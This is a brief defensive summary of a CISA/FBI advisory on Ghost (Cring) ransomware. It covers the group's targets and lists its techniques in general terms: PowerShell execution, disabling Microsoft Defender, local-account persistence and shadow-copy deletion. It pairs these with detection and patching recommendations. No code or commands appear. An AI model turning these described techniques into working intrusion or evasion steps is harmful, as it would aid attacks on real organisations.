Active since early 2021, Ghost ransomware primarily targets outdated publicly facing services and exploits known vulnerabilities in internet-facing servers.

Key tactics, techniques, and procedures (TTPs) identified include the use of PowerShell for executing commands, disabling Microsoft Defender to evade detection, and creating local accounts for persistence in compromised systems.

In response to the evolving threat, AttackIQ released an attack graph showcasing the TTPs of Ghost ransomware, aimed at helping organizations assess their security controls.

Recommendations for detection include monitoring command line activities related to the deletion of volume shadow copies and the use of PowerShell to download malicious payloads.

Operated by a group based in China, Ghost ransomware has compromised organizations in over 70 countries, affecting critical infrastructure, healthcare, and educational institutions.

On February 19, 2025, CISA, the FBI, and MS-ISAC issued a Cybersecurity Advisory regarding Ghost ransomware, also known as Cring, outlining its tactics and indicators of compromise identified through FBI investigations.

The ransomware employs advanced encryption methods using AES-256 and RSA-4096 algorithms, while also inhibiting system recovery by deleting volume shadow copies.

Ghost operators utilize strategies such as rotating ransomware payloads and modifying ransom notes to evade detection and attribution.

CISA advises organizations to review their patching and detection recommendations to defend against attacks and prioritize the detection of techniques used by Ghost ransomware.

AttackIQ emphasizes the importance of continuous testing and validation of security controls to enhance defenses against Ghost ransomware and similar threats.